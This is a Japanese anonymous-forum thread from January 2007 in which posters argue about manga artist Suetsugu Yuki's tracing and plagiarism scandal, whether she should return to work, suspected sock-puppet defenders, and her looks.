90 :花と名無しさん:2007/01/09(火) 14:40:38 ID:???0
グラビアアイドルの画像の顔部分を
違う顔に挿げ替えたりしてるのと
たいしてかわらん事して漫画描かれてもな。
・・・いや、トレースはそれよりも悪質か。
なぞってさも「自分で描きました」だから。


91 :花と名無しさん:2007/01/09(火) 15:05:39 ID:???0
>90
多くの漫画家やイラストレーターが同じことしてるじゃん。
有名なところではイノタケとか。
ど素人が実態も良く知らずに生意気いわないこと。

92 :花と名無しさん:2007/01/09(火) 15:44:24 ID:???0
テンテー乙です。今日はPCからですか?
多くの漫画家が同じことしてるからどうだというのですか?
テンテーが自分でしたこと悪事を省みることが何故できないのですか?
相変わらず反省なんてしてないのですね。

93 :花と名無しさん:2007/01/09(火) 15:52:44 ID:???0
有名なところでは「末次由紀」とか。
…の間違いじゃないの?
全国ニュースで有名になったんだし。


94 :花と名無しさん:2007/01/09(火) 16:13:52 ID:???0
相変わらず「自分は悪い事はしてない」って言いたいわけですね。
突っ込み甲斐のある方ですW

95 :花と名無しさん:2007/01/09(火) 16:47:23 ID:???0
それは「世の中に窃盗犯というものが存在しているんだから、アテクシも窃盗してもいいよね」
みたいなことを言いたいわけか91タン

96 :花と名無しさん:2007/01/09(火) 16:58:36 ID:???0
みんな停めてるやないの〜!っていう違法駐車撲滅キャンペーンCMの
オバちゃんみたいなもんかw

97 :花と名無しさん:2007/01/09(火) 17:27:58 ID:???O
漫画に金だす購買者は、たいていド素人じゃないの?
お客様はパクりに口出しすんなってこと?

98 :花と名無しさん:2007/01/09(火) 23:13:54 ID:HYwDintm0
ど素人な読者を見下してなきゃできない発言ってあるよね…。
パクリやトレースを指摘されてもそんな感じで見下してたんだろな。
ど素人ごときが・・・ってorz

99 :花と名無しさん:2007/01/10(水) 01:21:46 ID:???0
がっかりだよ!

100 :花と名無しさん:2007/01/10(水) 06:47:35 ID:???0
まあ、いいんじゃない?
出来たとしてだけど、復帰した時の風当たりが強くなるだけ。

101 :花と名無しさん:2007/01/10(水) 07:49:22 ID:???0
>>91
>多くの漫画家やイラストレーターが同じことしてるじゃん。

あ、そう?じゃあイノタケ以外の具体名挙げてみて。
他人をど素人呼ばわりするあんたがなんのプロかは知らんけど
脊髄反射で生意気なことほざかないこと。
あんたの言ってることは単なる泥棒擁護だから。

  お 里 が 知 れ る よ w

102 :花と名無しさん:2007/01/10(水) 14:16:52 ID:???0
もちつけ
テンテーのスレはテンテーの話題だけ!だよう

103 :花と名無しさん:2007/01/10(水) 17:18:57 ID:???0
早く復帰してくれー

104 :花と名無しさん:2007/01/10(水) 17:52:19 ID:???O
復帰したらどんなの描くんだろう

エデンみたいな
「この汚れた世界の中で純粋なキミ」
だったら萎える

まあ、どんなのが連載されても純粋に楽しめないけど

105 :花と名無しさん:2007/01/10(水) 18:19:04 ID:???0
ああ漫画は誌面がもったいないから
参番館通信だけ復活早くしてくれー

106 :花と名無しさん:2007/01/10(水) 19:27:01 ID:???0
今はパクリの時代でしょう。
完全なオリジナル作品は難しいんじゃねえ?
日本音楽界の帝王のB’zでさえ外人アーティストの曲の一部をまんまパクリまくっているし、
最近カプコンの某ホラーゲームをプレイしていて寄生獣っていう漫画に登場する化物そっくり
の敵は登場はするわ、やりたい放題じゃん。

107 :花と名無しさん:2007/01/10(水) 19:30:54 ID:???0
じゃあテンテーもやりたい放題で復帰したらいい。
こっちもやりたいように対応するからw

108 :花と名無しさん:2007/01/10(水) 20:59:48 ID:???0
この人、サイトだけは
このスレでも
人気
だよねえwwww

サイトだけは

109 :花と名無しさん:2007/01/10(水) 21:04:03 ID:???0
まんがつまんなかったもん。

110 :花と名無しさん:2007/01/10(水) 21:09:33 ID:???0
騒動が起きるまで名前しか知らなかったんで、この間読んでみたけど
正直たいして面白くなった。
勿論盗作は違法だしいけないけど、他人の素材使ってそれより上の作
品を描けたらそれはそれで一種の才能だと思う。
でも、人のものパクってこの程度じゃあ論外。
復帰しても先が知れてる気がする。

111 :花と名無しさん:2007/01/11(木) 00:49:50 ID:???0
そもそもオリジナルティのないことが
全作品絶版回収によってはっきりした。
ストーリーですらパクリ漫画なんだから
それで感動系作品を描く漫画家として
売ってた以上、もう末次に価値はないと思う。

路線変更するにしても無理だ。
あまりにもこの人はドス黒すぎる。

112 :花と名無しさん:2007/01/11(木) 01:18:15 ID:???0
それでも復活してくれ!

113 :花と名無しさん:2007/01/11(木) 01:30:09 ID:???0
ドス黒さ増して復活はキツイなw
このまま静かに漫画界から去った方がいいのに。
何したって「盗作少女漫画家・末次由紀」なんだから。 

114 :花と名無しさん:2007/01/11(木) 01:39:37 ID:???0
女性誌で復活とか書いてあるけど本当に復活できるの?
少女漫画家なんてあんまりしらないけど
矢沢あいぐらい人気あるのかな?

115 :花と名無しさん:2007/01/11(木) 01:53:22 ID:???0
矢沢あいに失礼すぎるwww

116 :花と名無しさん:2007/01/11(木) 02:13:43 ID:???0
>矢沢あいぐらい人気あるのかな?

工エエェェ(´д`)ェェエエ工工
はっきりいってありません。
「盗作騒動で初めて知った漫画家」と
言われる事の方が多いレベルの人です。


117 :花と名無しさん:2007/01/11(木) 02:52:02 ID:???0
そういうレベルの人にたいした需要があるとは思えないんだが
復帰するのかな?
つか、普通に考えると恥ずかしくてもう復帰なんかできないと思う

118 :花と名無しさん:2007/01/11(木) 02:59:13 ID:???0
>>117
恥を知る感性があったら最初からこんなことしてないに1票。

119 :花と名無しさん:2007/01/11(木) 03:53:37 ID:???0
盗用は当然恥ずかしいことだが、
misakiもなー……
あんなことあってもサイトを「一時閉鎖」に
しておくその神経がワカラン
思い出すたび情けなくて恥ずかしくてたまらなく
なりそうなもんだが

120 :花と名無しさん:2007/01/11(木) 04:24:09 ID:???0
盗用なんて発覚していないだけで他にも大勢いるだろ。
それよりも、とっとと復帰してほしい。
その時はmisakiの名義で。

121 :花と名無しさん:2007/01/11(木) 09:05:07 ID:???0
盗用発覚してて指摘されてるのに
次々とまた盗用を繰り返す。
開き直っていなきゃできませんね…。
misak名義でブログだけの復活ならいいか。
漫画はいらんなw

122 :花と名無しさん:2007/01/11(木) 16:54:51 ID:???0
ブログだけっていいなー

123 :花と名無しさん:2007/01/12(金) 00:43:10 ID:ruEWh13eO
>>114
矢沢あいの人気には到底及ばないけど
少女漫画家のなかでは有名なほうだった
地味ながらも人気あったんじゃないかな

124 :花と名無しさん:2007/01/12(金) 01:19:46 ID:???0
雑誌の中では結構ページもらえてたみたいだけど、
少女漫画界全体では知名度高くはなかったっしょw

125 :花と名無しさん:2007/01/12(金) 01:25:19 ID:???0
ちっともなw

126 :花と名無しさん:2007/01/12(金) 01:35:25 ID:???O
パクってりゃ仕上がり早いしな。
雑誌的には便利だったんじゃない?

127 :花と名無しさん:2007/01/12(金) 02:32:13 ID:???0
>>123
無名とは言わないが有名ってのも違う気がする。
基本的に別フレ読んでなきゃ知らないレベルでしょ。

128 :花と名無しさん:2007/01/12(金) 02:32:59 ID:???0
「大ファン」が騒動後に古本屋で単行本揃える程の人気だったよねw

129 :花と名無しさん:2007/01/12(金) 05:09:04 ID:???0
スラムダンクみたいな超有名で人気の作品の一部を使ってしまったから、
比較的容易に発覚されあんだけの騒動になってしまったんだと思う。
漫画の世界では他漫画や雑誌の流用やトレースなどは一般的に行われ
ている事だから、やせめてマイナーな作品からにしとくべきだったね。
熱狂的なファンや信者が多いスラムダンクはマズかったと思う。

130 :花と名無しさん:2007/01/12(金) 06:07:38 ID:???O
…とテンテーが申しております

131 :花と名無しさん:2007/01/12(金) 09:25:12 ID:UOglyQmf0
末次由紀の名前は有名じゃなくて
悪名高かった。というのが正しいと思う。

>>129
マイナー相手なら何してもいい。
そんな考え方は末次そっくりですね。

132 :花と名無しさん:2007/01/12(金) 09:49:57 ID:???0
>>129
人間性にかなり問題があるな。

133 :花と名無しさん:2007/01/12(金) 12:16:48 ID:???O
それこそスラダン作者みたいに、言い訳や他人を責め立てたりせずに粛々と手続きをすれば良かったやん
事後処理下手すぎ。つか世間知らずすぎ。

134 :花と名無しさん:2007/01/12(金) 13:07:49 ID:???0
世の中をなめてるんでしょ。

135 :花と名無しさん:2007/01/12(金) 13:15:50 ID:???0
自演での擁護が「全然反省なんてしてない」という事を表してるからね。
マイナー作品からトレスしてたらとか、そんなレベルの問題を超えてる。


136 :花と名無しさん:2007/01/12(金) 17:00:48 ID:???0
ペンを置く
のすぐあとに
ふんばって描き続けて

てのはなあぁ…

137 :花と名無しさん:2007/01/12(金) 21:34:42 ID:???0
辞める気が全くないから復帰説が出てくるんだろうし
やっぱり自作自演のmisakiはテンテーの本音なんだね。
反省してないとかいうよりもテンテーの思考が怖いなと思う。

138 :花と名無しさん:2007/01/12(金) 21:52:21 ID:???0
末次先生カムバック!

139 :花と名無しさん:2007/01/12(金) 22:56:35 ID:???0
サンドバッグ!

140 :花と名無しさん:2007/01/12(金) 23:40:39 ID:???0
ジャンプだったっけ?援交で逮捕されてから復活した人?
あんな感じで戻ってきてほしいのだが・・・

141 :花と名無しさん:2007/01/12(金) 23:50:40 ID:???0
まあしかし、ある意味正直な反応と言えるね。
自力オンリーでは漫画を描けない事を認めてるようなものだから。

142 :花と名無しさん:2007/01/12(金) 23:59:33 ID:???0
漫画家が漫画で罪を犯してる事は重い。
まして盗作行為なんて最低じゃないか。
援助交際で捕まった人とは明らかに違うよ。
パクリでも軽蔑されるのに上からなぞって仕上げてるなんて…。
それにずっと何年も指摘されていたのに続けてたとか。
ここまで常習性をもった盗作行為だと反省なんて無理だね。

143 :花と名無しさん:2007/01/13(土) 00:24:36 ID:???O
でも犬のやつラストまで読みたかったなー

144 :花と名無しさん:2007/01/13(土) 00:37:59 ID:???0
全部テンテーが悪いのですよ。

145 :花と名無しさん:2007/01/13(土) 02:48:59 ID:???0
>>140
円光と盗作トレスはまた別の次元だからねぇ
盗癖って直らないよ
もし戻ってもまた同じ事やると思うよ
ま、それはそれで面白いから復活して欲しいかもw

146 :花と名無しさん:2007/01/13(土) 07:31:53 ID:???0
>>129
まるでこの世に自力だけで漫画描いてる漫画家がいないみたいですね
貴方の主張だと。
皆が皆、末次先生レベルの実力と倫理観しかないわけではないと思う
んですけどね。

147 :花と名無しさん:2007/01/13(土) 10:12:19 ID:???O
>>143
とっくに完結してる

148 :花と名無しさん:2007/01/13(土) 10:59:18 ID:???0
自力で描けないからトレースしたのもあるんだろうけど、
末次テンテーの場合は
「漫画に時間掛けるのが嫌だからトレースでさっさと片付けた。」としか思えない。
ブログにももう少し原稿に時間掛けたほうがいいんだろうけど〜みたいに書いてあったし…。
この人にとって漫画は原稿よりも遊びを優先する程度の思い入れしかないんだろうな。

149 :花と名無しさん:2007/01/13(土) 14:30:56 ID:???0
「好き」だけで職業は成り立たないっての判るけど、創作関係で
遊ぶ時間優先する程度の気持ちってのは何だかなあ。
聞いただけで読む気が萎えそう。

150 :花と名無しさん:2007/01/13(土) 17:47:17 ID:???O
と言うよりこんな量産しつつ仕事も早くて担当さんともラブラブで友達もたくさんいて軽く遊びもこなすっていう
なんでも出来る(でも男受けいい程度にドジっこな)自分を演出するのに必死って感じだったよ。
いい歳して身のない生き方だよね。

151 :sage:2007/01/13(土) 17:58:40 ID:IfX7ZwY+0
テンテーが自伝漫画でデビュー前からパクリ漫画家になるまでの経緯を
描いてくれたら読んでみたいです。
買いたくはないので、ぜひ参番館で連載してください。

152 :花と名無しさん:2007/01/13(土) 18:47:27 ID:???0
サイトも閉鎖じゃなくて一時閉鎖にし続けてるところに
テンテーの異常なガッツを感じる!

153 :花と名無しさん:2007/01/13(土) 21:36:01 ID:???O
末婆の漫画早く読みたい

今度は何をパクるんだろう

154 :sage:2007/01/13(土) 22:50:07 ID:???0
>>153
この一年の間にマイナーどころの漫画や同人誌を買い漁って
新たなパク先を発掘してたとしたらコワイ。

155 :花と名無しさん:2007/01/14(日) 00:13:52 ID:???0
それこそ鼻息荒く「私ならこうやって創る!」って
ストーリーも絵もつぎはぎ繰り返してるだろうな。
「今度はバレない。マイナーな漫画からだから」と。

・・・やってそうなんだよな。


156 :花と名無しさん:2007/01/14(日) 01:48:30 ID:???0
まあどうであれ復活してほしいな。

157 :花と名無しさん:2007/01/14(日) 01:59:21 ID:???O
盗作なしで末次由紀が書く漫画をもう一度読みたい。

158 :花と名無しさん:2007/01/14(日) 02:15:40 ID:???0
無理だな。

159 :花と名無しさん:2007/01/14(日) 03:12:39 ID:???0
漫画はどうでもいい。
日記を最初から読みたい。

160 :花と名無しさん:2007/01/14(日) 07:15:36 ID:???0
スラダンの作者も雑誌からパクっているのだけど、末次
の場合は騒動になってしまって運がなかったのでは
http://www.yuko2ch.net/inoue/up65379.jpg
http://www.yuko2ch.net/inoue/up3910.jpg
http://www.yuko2ch.net/inoue/up65919.jpg

161 :花と名無しさん:2007/01/14(日) 07:57:11 ID:???0
スラダンの作者はどうでもいいんですよ、ここでは。
それにmisaki騒動など、無用に事を大きくしたのは末次先生自身。
運がなかった?
単に愚かなだけ。

162 :花と名無しさん:2007/01/14(日) 09:31:48 ID:???O
スラダンはその後速行で許可取ったんでしょ
テンテーも「関係者に深くお詫びします」じゃなくて、「関係者ひとりひとりにお詫びして許してもらいました」
ならいけたんじゃないかと思うけどね

163 :花と名無しさん:2007/01/14(日) 10:08:41 ID:???0
そもそもスラダンの人は十年も、それも何度も指摘うけながら
トレース繰り返し続けたわけじゃないでしょ?
これ程悪質な人は珍しいから騒動になったわけで、ご本人も、
信者の人も判りきってる事を無視して「誰でもやってるから
悪くない」の繰り返し…
みっともないなんて物じゃないね。

164 :花と名無しさん:2007/01/14(日) 11:00:31 ID:???0
>>160
イノタケのスレにどうぞ
ここは末次由紀の話題を語るスレ


165 :花と名無しさん:2007/01/14(日) 15:17:23 ID:rvWy+/Z70
>>163
そもそも末次由紀って人は十年も、それも何度も指摘うけながら 
トレース繰り返し続けたわけじゃないでしょ? 
これ程悪質な人は珍しいから騒動になったわけで、ご本人も、 
信者の人も判りきってる事を無視して「誰でもやってるから 
悪くない」の繰り返し… 
みっともないなんて物じゃないね。 


スラダンじゃなくて「末次由紀」に直しておきましたよ。

166 :花と名無しさん:2007/01/14(日) 15:19:47 ID:rvWy+/Z70
「スラダンをトレースした人」でも可だったな。

167 :花と名無しさん:2007/01/14(日) 15:35:34 ID:???0
>>160
もたらした経済効果が天と地ほどに違いすぎ、ってのもあるだろうけどね>テンテーとイノタケ
スラダンじゃNBAブームで関連グッズもバカ売れ、現地への観戦ツアーも大入りだったし
バガボンドだって吉川英治の原作本(ちなみに版権は講談社w)や五輪書も再び売れた。
テンテーも絶版になった小説からストーリーパクろうなんてせこいこと考えないで
原作:タニス・リー「銀色の恋人」って、ちゃんとクレジットうてば良かったのにw
再販に貢献でもすれば世間の見る目も少しは変わったかも知れんよ。

168 :花と名無しさん:2007/01/14(日) 15:54:21 ID:???0
>>167
確かにあれは絶版だけど、タニス・リーはファンが多いのに
その辺を考えず、絶版になってるからバレないだろうなんて
考えてたなら愚かすぎ。
よりによって「シルバー」なんてタイトルつけてるし。

169 :花と名無しさん:2007/01/14(日) 21:03:18 ID:???0
>165
そもそも末次由紀って人は十年も、それも何度も指摘うけながら
トレース繰り返し続けたわけじゃないでしょ?

老婆心ながら、直さなくても良かったと思います。
末次嬢は(十年かは判らないが)何度も指摘受けながら
トレース続けてたわけで…
認めて漫画家止める事考えた謝罪後も、直後から

170 :163:2007/01/14(日) 21:16:18 ID:???0
>>165
余計な事をしてくださって、ありがとう。
169さんの仰ってるのが正しい。
訂正の必要は全くありません。


171 :花と名無しさん:2007/01/14(日) 21:16:27 ID:SROj7V8D0
原作貰って描くにしろ、画力があれじゃしょうもないし、


172 :花と名無しさん:2007/01/14(日) 22:05:35 ID:???O
ストーリーは原作貰って
絵はトレスのオンパレードっすか?!
それはそれで、ちょっと見てみたいw

173 :花と名無しさん:2007/01/14(日) 22:07:14 ID:???0
テンテーが何度も指摘を受けながらもトレース繰り返してたからこその>163発言な訳で、
それをひっくり返したら意味が通らなくなるじゃないか…
>165が問題を全く理解していないことは良くわかったが、何をしたかったのかわからない


174 :花と名無しさん:2007/01/14(日) 23:23:13 ID:???0
句読点と改行がちょっと変だから誤読したんじゃないかなと推測。

175 :花と名無しさん:2007/01/14(日) 23:52:13 ID:???0
なんか恥ずかしい事とか悪い事してたって感覚が皆無なんだろうと思う、
テンテーには。
今頃は復帰にむけて画力上げるよりもせっせとファンサービスでも
してるかな。


176 :花と名無しさん:2007/01/15(月) 00:59:33 ID:???0
テンテーってファンサービスというより
自分の作品(パクリ・トレス作品でもそう呼んでいいのかどうか…)の
布教活動に必死だなーとブログ読んでて思ってた。
それと自分がどんなに読者に対して優しいとか親しみやすいとか
なんでそこまで書かなきゃならないの?と不思議なくらい必死すぎ。

日常生活で友人のいない人がネットで必死になって
良い人装って友達作ろうとする姿と重なるんだよね…。

177 :花と名無しさん:2007/01/15(月) 06:31:00 ID:???0
別に凄く優しいとかいい人とかじゃなくてもいいのにね。
普通であって、完全オリジナルな作品をちゃんと描いてくれれば
漫画家としては充分なんだけどね。

178 :花と名無しさん:2007/01/15(月) 08:27:51 ID:???0
>別に凄く優しいとかいい人とかじゃなくてもいいのにね。
いや、これは重要だぞ。
いくら作品が好きでもその作者が感じの悪い人だったら
やっぱ嫌だし、作品に対する見方も変わってくる。

179 :花と名無しさん:2007/01/15(月) 09:23:41 ID:???0
コミックの柱やあとがき漫画やブログでしつこいくらい
優しい人、良い人ぶりを必死にアピールする漫画家は胡散臭い。
作品自体も胡散臭くよどんで見えてくる。テンテー漫画がそうでした。

まぁテンテーは嘘つきでとんでもない盗み癖のある人柄でしたが。
現実の自分と理想の自分(良い人、親しみやすい人)とは
遠くかけ離れているのを理解していた上での必死さだったのかも。
嘘つきは泥棒のはじまりって本当だよな〜。

180 :花と名無しさん:2007/01/15(月) 14:20:44 ID:???0
優しい人いい人ぶりアピールよりも、
天然アピールのほうがウザかったな…
自分の天然を自覚してるエセ天然ほどタチ悪いもんはないよね

181 :花と名無しさん:2007/01/15(月) 18:17:19 ID:???O
今回のバラバラ殺人とか有栖川の詐欺とか有り得ないほど見栄からの犯罪を知ると
なんとなくテンテー思い出しちゃう。普通に生きてれば充分恵まれてたのに
バカだなーて


182 :花と名無しさん:2007/01/15(月) 18:33:33 ID:???0
>>178
小学生みたいな読み方するねw

183 :花と名無しさん:2007/01/15(月) 19:25:07 ID:???0
>>178
普通に優しい人ならいいんじゃないの?
漫画家だって人間だし、そうそう完璧を求めるものじゃない。
もっとも末次先生の場合、露見した事実だけで既に論外の領域だと思うが。

184 :花と名無しさん:2007/01/15(月) 22:12:27 ID:???0
作者が多少アイタタでも漫画が面白ければ読む。

作者がアイタタどころか倫理観が薄くて肝心の漫画に盗用があるとなると
確かに論外。

185 :花と名無しさん:2007/01/15(月) 22:17:10 ID:???0
まんま一部を使うとか、ある意味やる事がかわいらしいと思う。
そんな先生は結構好きなタイプかもしれん。

186 :花と名無しさん:2007/01/15(月) 22:22:56 ID:???0
「まんま」ではないよ。
トレスして顔は自分のキャラに変えたり
反転してたり、ずらしてトレスしてる。

やってる事はかわいらしいじゃなくて、いやらしい。


187 :花と名無しさん:2007/01/15(月) 22:27:06 ID:???0
「ピーーーー」を「パーーーー」に変えたりw

188 :花と名無しさん:2007/01/15(月) 22:32:46 ID:???0
反転してさらに「ピーーー」を「パーーー」だもんな。

えげつないにも程がある('A`)

189 :花と名無しさん:2007/01/15(月) 22:33:42 ID:???0
ttp://www.geocities.jp/z4c8/img/PARTY.gif
末次先生切ない顔しているね・・・

打ち切りや絶版・回収の処置が下された時は
一日中泣きじゃくっていたのでは
そろそろ復活・再販してもいいと思うんだが。

190 :花と名無しさん:2007/01/15(月) 22:39:57 ID:???0
>>189 末次テンテー乙。
十年以上は復活しなくていいよ。
それだけの長い期間、盗作という悪事を働いていたんだから。


191 :花と名無しさん:2007/01/15(月) 22:43:32 ID:???0
テンテー、絵もストーリーもどこかからちょっとずつ盗まなきゃ描けなかった
漫画家なんていらないよ。
気の毒だけど、自分のためにも別の道考えた方がいいんじゃない?
復帰してもまた描けなくなったら手が勝手にパクっちゃうでしょ。

192 :花と名無しさん:2007/01/15(月) 22:45:11 ID:???0
>>189のパーティ写真って
悪徳商法といわれるネットクラブのパーティという噂が…。
末次が絶版回収措置で泣く前にパクラレ元の人は
悔し泣きしてたのでは?
だいたい絶版回収の措置は盗作盗用しまくった
末次自身が起こした事でしょ。
>>185といい>>189といい末次なんだろうかw


193 :花と名無しさん:2007/01/15(月) 22:54:08 ID:???0
猫耳にリボンつけておいて
切ない顔もなにもあるかよwww

194 :花と名無しさん:2007/01/15(月) 22:57:10 ID:???0
切ない顔ワロスw
どこまで同情ひこうとしてるんだよw

195 :花と名無しさん:2007/01/15(月) 23:04:53 ID:???0
189だけど、断じて先生ではない事を言っておく。
ただ先生とは共感できる部分があるのは事実かもしれない。
自分はHP持っているけど、自分のHPに他人のHPの写真を
パクって使ったり、雑誌をスキャンしてデザインを取り込んで
若干手を加えたり色だけ変更して使ったりしている自分とは同
じ存在を感じるもので。

196 :花と名無しさん:2007/01/15(月) 23:07:05 ID:???0
鯖にデリられても自分の非を認めず「この糞鯖!」と罵ってたりしてませんか?

197 :花と名無しさん:2007/01/15(月) 23:09:06 ID:???0
>>189=195
最低だな。末次と同じ事してるからかよ。


198 :花と名無しさん:2007/01/15(月) 23:13:36 ID:???0
189=195みたいなのが湧いてきたから
「こんな奴に擁護されたくない。あんたと私じゃ格が違うのよ!」って
テンテーがmisakiになって降臨しそうな予感。

自演擁護の時みたいに、擁護しくれてた人の気持ちを踏み潰して降臨した時の様に。


199 :花と名無しさん:2007/01/15(月) 23:20:52 ID:???0
テンテーの擁護って195みたいなイタタな人が多いね。
同じ穴の狢だから共感って、儲の方がまだマシに思えてきた。

200 :花と名無しさん:2007/01/16(火) 02:18:38 ID:???0
>>195みたいな人がテンテーに共感を覚えるのは


納得

201 :花と名無しさん:2007/01/16(火) 08:06:04 ID:???0
>>195
単なるドロボー野郎じゃねーかw

202 :花と名無しさん:2007/01/16(火) 11:13:01 ID:???0
195とテンテーは泥棒同士だから共感できるのか。
明日のわが身…で心配ですか。

203 :花と名無しさん:2007/01/16(火) 19:33:37 ID:W3MbFSEz0
>>189
末次由紀って、顔可愛いね

204 :花と名無しさん:2007/01/16(火) 20:18:25 ID:???0
テンテー、しつこいゾw

205 :花と名無しさん:2007/01/16(火) 20:42:42 ID:???0
まあまあ、感想述べるのは自由でしょ。
どんな顔だろうが、私的には印象は変わらない。
この前、清楚な感じとか言われてたけど、清楚な泥棒漫画家
というものを想像して笑ってしまったよ。

206 :花と名無しさん:2007/01/16(火) 20:45:26 ID:???0
自分は「ああいう顔でも泥棒するんだー」と感慨深かったな。

207 :花と名無しさん:2007/01/16(火) 20:47:07 ID:???O
ええ〜?可愛いっていうから期待してたのにあの程度?
がっかりだ
表情のせいかなんか貧相だし

208 :花と名無しさん:2007/01/16(火) 22:07:24 ID:???0
狸顔だなーと思っていたが本当に人を化かしてとは・・・。



209 :花と名無しさん:2007/01/16(火) 22:38:25 ID:???O
確かに超ブスではないがちょいデブのオタク女って感じだね。オタク連中にはこういう程度が萌え〜なのかな…

210 :花と名無しさん:2007/01/16(火) 23:32:47 ID:???0
少女漫画家のなかでは普通にマシなほうでしょ。
美人漫画家と呼ばれてたし。

211 :花と名無しさん:2007/01/16(火) 23:40:56 ID:???0
腹の中は黒々してますがね

212 :花と名無しさん:2007/01/16(火) 23:45:39 ID:???0
新條まゆたんと同じくらいの顔偏差値だな。>末次テンテー

狼住民が「末先生、キャワ!」「末先生を叩く少女漫画板住民はドブス」
と祭りにするわけだ…。

213 :花と名無しさん:2007/01/17(水) 00:14:00 ID:???0
美人っていうから期待していたら
どこにでもいる普通の顔でがっかり。
美人だとか可愛いとかそういうのじゃなくて
猫耳に惑わされてるだけだな。
でもブログの写真の鼻を隠してる理由がわかったw

テンテーって30代前半だったはず。
テンテーが大学生当時の流行の漫画を漁ったら
パクラレ元がわんさか出てきそうなんだけど
その当時の漫画がよくわからない…。
十年以上も盗作活動続けていたなんて
本当に悪質極まりないな。

214 :花と名無しさん:2007/01/17(水) 01:05:37 ID:???0
>>210
いつ呼ばれてたんだw

215 :花と名無しさん:2007/01/17(水) 02:34:11 ID:???0
盗作騒動が週刊誌に取り上げられたときっしょw
とりあえず「美人」ってつけとくかぁ?みたいなお約束w

216 :花と名無しさん:2007/01/17(水) 02:45:49 ID:???0
>>215
横領で逮捕されたOLとか団体職員が週刊誌の見出しで「美人」って称されるのと同じ法則だよねw

217 :花と名無しさん:2007/01/17(水) 06:26:52 ID:???0
そう書いときゃ釣れるからな

218 :花と名無しさん:2007/01/17(水) 09:23:31 ID:???0
テンテーのイラストで写真で見たことがあるようなのが…
ゴマキだった気がするんだけど、その写真をどこのサイトで見たのか思い出せない。

219 :花と名無しさん:2007/01/17(水) 12:20:21 ID:???0
絵も話も盗作と盗用かよ。
それで復帰考える方がおかしい。
ちゃんと筆を折るべきだ。

220 :花と名無しさん:2007/01/17(水) 13:18:09 ID:???0
復帰もアリと思う。
連載中の作品を打ち切りにされ全ての単行本も絶版・回収という
それ相応の重い結果になってしまったし。
但し、参考程度じゃなくまた盗作やってしまったというのなら、その
時は筆を置けばいいのでは。

221 :花と名無しさん:2007/01/17(水) 13:41:19 ID:???O
復帰するだけでもすごい面の皮だな〜と思うけど
パクった作家さんがうようよいるパーティーにもふつーに来そうなのが
コワいよ…テンテーの場合

222 :花と名無しさん:2007/01/17(水) 15:33:17 ID:++fhs0Bk0
テンテーが自分で筆を置くっていってたのに・・・
なんで置かないの?おかしいよ。
連載中の作品打ち切りは当たり前。
その作品でも盗作繰り返していたのだから。
最近遠まわしなテンテー擁護あるけど、根本的な事をはぐらかしている。

223 :花と名無しさん:2007/01/17(水) 18:09:32 ID:???0
自ら置くって書いてたんだよね?

224 :花と名無しさん:2007/01/17(水) 18:25:31 ID:???O
>>233
テンテー大好きだから止めないでーて じ ぶ ん で 書いてたのはその後じゃなかったっけ

225 :花と名無しさん:2007/01/17(水) 18:27:27 ID:???0
確かに末次せんせーは筆を置くと書いたが、
しかしその後に末次せんせークローンのmisakiが
「ふんばって書きつづけてください 新しい作品を楽しみにしています」
と渾身の発言を残している。

226 :花と名無しさん:2007/01/17(水) 18:29:05 ID:???O
スマソ>>223の誤り

227 :花と名無しさん:2007/01/17(水) 18:43:02 ID:???0
misakiタンに言わせりゃ
盗作なんて大したことじゃないらしいですからね

228 :花と名無しさん:2007/01/17(水) 19:17:51 ID:???0
>>220
純粋に聞きたいんだけど、なんで復帰アリだと思うの?
一度や二度のパクじゃないのに。
またやらかすとは思わない?

229 :花と名無しさん:2007/01/17(水) 19:35:40 ID:???0
やめたいと思うのももっと描きたいと思うのも
矛盾があるのが人間でしょ

230 :花と名無しさん:2007/01/17(水) 19:37:01 ID:???0
恥も外聞もなく復帰して、好奇の目が光る中
再び言い逃れ出来ないパクやらかして永久あぼーん
…はこっそり願ってるけどw

231 :花と名無しさん:2007/01/17(水) 19:41:44 ID:???0
>>229
でもそれを問題起こした張本人が口に出しちゃ
「反省してない」と思われて当たり前。

232 :花と名無しさん:2007/01/17(水) 19:49:39 ID:???O
>>230
私は堂々と願ってるけどw
盗作漫画家再び使うくらいなら新人発掘して
育てた方がよっぽど出版社的にもいいと思うんだけどな

233 :花と名無しさん:2007/01/17(水) 23:04:56 ID:???0
こんな盗作漫画家を再び使ってのさばらせていたら
育つ新人も育たないな。


234 :花と名無しさん:2007/01/17(水) 23:35:42 ID:???0
>>229
矛盾もへったくれもない。
反省の色全くなしでは、筆を折るなんてのは所詮ポーズにすぎない
と思われても仕方ないと思う。
そんな人間が同じ事をまたやらないと思うほうが不思議。

235 :花と名無しさん:2007/01/18(木) 00:27:02 ID:???0
>>229 テンテー乙

236 :花と名無しさん:2007/01/18(木) 04:20:35 ID:???0
講談社の謝罪文で認識が甘かったって本人自身が言っているし、
盗作問題に発展し今までの全てを失った事で本人自身も変わっていると思うよ。
長い目で見守ってあげてもいいのでは

237 :花と名無しさん:2007/01/18(木) 04:59:19 ID:???O
復帰できるかは本人次第

238 :花と名無しさん:2007/01/18(木) 06:14:42 ID:???O
>>229
すごい一貫性だよ

自分で創造する気も実力もない
他人からちやほやされたい
自分だけが大事
他の漫画家やクリエイターに敬意を払う気は全くない
他人が苦労して創ったものを横からかっさらう

いったいどこに矛盾が?


239 :花と名無しさん:2007/01/18(木) 06:20:38 ID:???O
ゴメソ>>238です

>>229うんまあ自分で創る気はないのに、描きたいって言うのは矛盾だよね

240 :花と名無しさん:2007/01/18(木) 09:17:58 ID:???0
>>236
認識が甘かった。
という台詞は一度きりしか盗作してない場合しか使ってはいけない。
あの謝罪文だっておかしいよ。
この人は何年にも渡って盗作を指摘されていたのに続けてきた。

だいたい失ったものと言っても、
元々他人の作品を盗作して築き上げてきた物がゼロになっただけ。
全てを失ったと言う事は、それだけ泥棒しまくってきたという事でしょう。
何年も盗作してきた人間を長い目で見守るなんて実におかしい事です。
しかも指摘してくれる人がいたと言うのに…。
公式HPで謝罪して数時間後に自作自演で擁護する人物が
良い方に変わるだなんて思えない。この人は普通の人じゃない。
綺麗さっぱりと漫画家をこのまま静かに引退するべきです。

241 :花と名無しさん:2007/01/18(木) 09:33:04 ID:???0
>>236
そもそも、長い目で見守ってあげなきゃならない義理なんてない

242 :花と名無しさん:2007/01/18(木) 11:23:06 ID:???0
長い目で見守って欲しいというのは
テンテー側の勝手な願望でしかない。

243 :花と名無しさん:2007/01/18(木) 12:43:08 ID:???0
>>236
ここの住人以上にテンテーを長い目で見守っている人たちはいないと思うよ。
その視線は冷ややかだったり、生温かったりするけどw

